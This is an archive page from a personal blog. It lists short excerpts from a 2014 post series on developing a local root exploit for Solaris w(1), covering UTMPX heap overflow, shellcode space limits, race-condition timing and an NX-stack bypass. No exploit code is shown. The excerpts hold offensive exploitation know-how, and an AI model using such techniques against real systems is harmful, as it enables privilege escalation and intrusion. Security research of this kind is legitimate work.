• Log In
↓ Skip to Main Content

Bazz's Code Developments

Main Navigation

  • Home
Home › View all posts by michaelbazzinott001

Author: michaelbazzinott001

NX-stack bypass w(1) Local Root Exploit Realization <3 - Pt. 19

By michaelbazzinott001 Posted on November 7, 2014 Posted in Asm, buffer overflow, C, NameFS, Sparc/Solaris No Comments

Woo-Hoo. I’m finally ready to release source code :D

Heap-Based Execution from UTMPX entries – Pt. 17

By michaelbazzinott001 Posted on November 6, 2014 Posted in Asm, GDB, Sparc/Solaris No Comments

there’s only enough room in the name[32] field for 28-4 = 24 bytes of ‘authentic’ asm instructions, followed by the 8 necessary for the call / branch instruction. What’s the difference between a call and a branch instruction.. Is it …

Heap-Based Execution from UTMPX entries – Pt. 17 Read more »

Race Condition SHMACE ShmUh’SMISION – pt. 16

By michaelbazzinott001 Posted on November 5, 2014 Posted in Uncategorized No Comments

WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ??? I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that: So I …

Race Condition SHMACE ShmUh’SMISION – pt. 16 Read more »

Race Condition Determination – Pt. 15

By michaelbazzinott001 Posted on November 4, 2014 Posted in Uncategorized No Comments

It appears to be a blind race!?!? :[ But it is NOT so. There is a way to determine where my cool cat program IS in the race!! By adding the overflow entry as a USER_PROCESS entry, it can be …

Race Condition Determination – Pt. 15 Read more »

Possible Circumvention — Pt. 14

By michaelbazzinott001 Posted on November 3, 2014 Posted in Uncategorized No Comments

In t_delete /* make op the root of the tree */ if (PARENT(op)) t_splay(op); make the parent point to another entry before in the heap… this is a entry/shellcode starter.. entry/shellcode (pp) starter format: SIZE(PP) is the first 8 bytes …

Possible Circumvention — Pt. 14 Read more »

Analysis Utilities — Pt. 13

By michaelbazzinott001 Posted on November 2, 2014 Posted in Uncategorized No Comments

Yes, The TREE Structure in the TREE UTMPX Entry must start on WORD-aligned boundary (8-byte aligned 32 bits), (16-byte aligned address on 64-bit) To understand the 32/64 TREE structure in raw form: Demontrated difference between ALIGN on 32-bit vs. 64-bit …

Analysis Utilities — Pt. 13 Read more »

3 Things today — Pt. 12

By michaelbazzinott001 Posted on November 2, 2014 Posted in Uncategorized No Comments

1 thing: Compiling 64-bit GDB 2 : Analyzing how the heap could be brute-forced in this exploit. 3: Discovering that the address returned by malloc is consistent across runs, on different machines!! With different UTMPX file sizes!! AWESOME!! The stack …

3 Things today — Pt. 12 Read more »

Being Awesome Pt. 11

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized No Comments

No this is really a comparison of Stack space between Solaris 10 and Solaris 8.. at least the machines in question.. Solaris 10 box: without one-million argV[1]: 0xffbfe000 0xffbfffff 0x2000 0 -s–rwx with it: 0xffb0a000 0xffbfffff 0xf6000 0 -s–rwx Solaris …

Being Awesome Pt. 11 Read more »

Raw dissection of malloc – Pt. 10

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized No Comments

Sorry this section and possibly others are not ordered properly.. It is raw research slate. Here is why ut_line parsing is important.. The test has lots of requirements to satisfy.. must be in /dev/ directory.. we have to be able …

Raw dissection of malloc – Pt. 10 Read more »

Hacking a temporary “W(1)” — pt. 9

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized No Comments

In order to do this exploit properly, 2 UTMPX entries will need to be used. 1 is the “last” one in the table and it must be pre-destined before takeoff. In other words, must be setup before calling “W.” It …

Hacking a temporary “W(1)” — pt. 9 Read more »

Posts pagination

1 2 3 … 6 Next
Copyright © 2025 Bazz's Code Developments | Powered by Responsive Theme